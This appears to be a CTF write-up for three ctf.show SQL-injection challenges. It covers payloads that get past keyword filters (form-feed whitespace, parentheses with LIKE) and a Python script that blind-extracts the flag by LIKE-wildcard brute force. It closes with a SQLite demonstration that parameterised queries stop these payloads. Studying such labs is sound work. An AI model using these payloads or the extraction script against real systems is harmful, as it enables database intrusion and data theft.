WEB-181
select is filtered
-1'%0cor%0cusername%0clike%0c'flag
WEB-182
Both flag and %0c are filtered, which is annoying, but parentheses can be used to get around it; then try the numbers one by one. The flag turned out to be at id=26.
-1'or(id)like'26
WEB-183
Everything that could be filtered is filtered, so only blind injection is left
import requests, re, time

# Character set the flag is assumed to be built from
dic = "abcdefghijklmnopqrstuvwxyz1234567890{-_}"
url = "http://77b9fcdf-0b47-4895-91e5-500a9094f5b9.challenge.ctf.show/select-waf.php"
res = []  # characters of the flag recovered so far
# The tableName parameter is turned into a whole from-clause; % is the LIKE wildcard,
# so the page reports one user as long as the known prefix is correct
post_tem = "(ctfshow_user)where(pass)like('ctfshow{{{}%}}')"
nowtime = time.time()
# headers = {
#     "Content-Type": "application/x-www-form-urlencoded"
# }
for a in range(1, 50):
    temp = len(res)
    for i in dic:
        res += i  # try the next candidate character
        nowtime = time.time()
        post = {"tableName": post_tem.format("".join(res))}
        print(post)
        r = requests.post(url=url, data=post)
        print(r.text[2533:2555])  # debug: the slice of the page that holds $user_count
        if re.findall(r"\$user_count = 1", r.text):
            break  # prefix matched, keep this character
        res.pop(-1)  # no match, drop it and try the next one
    if temp == len(res):
        break  # no character matched: the flag is complete
print("ctfshow{" + "".join(res) + "}")
Note that the post parameter should be a dict; otherwise no Content-Type is set in the request header and the parameters are not passed.
Key point: the percent sign % is a wildcard in MySQL statements.
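To show why the keyword blacklists in WEB-181 and WEB-182 fail and what actually closes the hole, here is an added example (not from the challenge or this writeup) that replays the two payloads above against an in-memory SQLite table. The table contents, the blacklists, and the shape of the backend query (username!='flag' and id='...') are assumptions; the parameterised variant is the fix.

```python
import sqlite3

# Constructed stand-in for the challenge's ctfshow_user table (row contents are assumptions).
ROWS = [(1, "admin", "p@ss1"), (26, "flag", "ctfshow{demo}")]
# Keyword blacklists approximating what WEB-181 and WEB-182 reject (assumptions).
FILTER_181 = ["select", " "]
FILTER_182 = ["select", " ", "flag", "\x0c"]

def waf_ok(value, blacklist):
    """Blacklist check of the kind the challenges simulate: case-insensitive substring match."""
    return not any(token in value.lower() for token in blacklist)

def _db():
    con = sqlite3.connect(":memory:")
    con.execute("create table ctfshow_user(id integer, username text, pass text)")
    con.executemany("insert into ctfshow_user values (?, ?, ?)", ROWS)
    return con

def lookup_vulnerable(user_id, blacklist):
    """String-built query (assumed shape): the blacklist passes, the injection still fires."""
    if not waf_ok(user_id, blacklist):
        return "blocked"
    sql = ("select id,username,pass from ctfshow_user "
           f"where username!='flag' and id='{user_id}' limit 1")
    return _db().execute(sql).fetchone()

def lookup_safe(user_id, blacklist):
    """Same query with a bound parameter: the payload is only a string value, no row matches."""
    if not waf_ok(user_id, blacklist):
        return "blocked"
    sql = ("select id,username,pass from ctfshow_user "
           "where username!='flag' and id=? limit 1")
    return _db().execute(sql, (user_id,)).fetchone()

if __name__ == "__main__":
    # WEB-181 payload, URL-decoded: %0c (form feed) is whitespace to the SQL parser but not to the filter
    p181 = "-1'\x0cor\x0cusername\x0clike\x0c'flag"
    # WEB-182 payload: parentheses replace whitespace, like replaces =
    p182 = "-1'or(id)like'26"
    print(lookup_vulnerable(p181, FILTER_181))  # (26, 'flag', 'ctfshow{demo}')
    print(lookup_vulnerable(p182, FILTER_182))  # (26, 'flag', 'ctfshow{demo}')
    print(lookup_safe(p182, FILTER_182))        # None
```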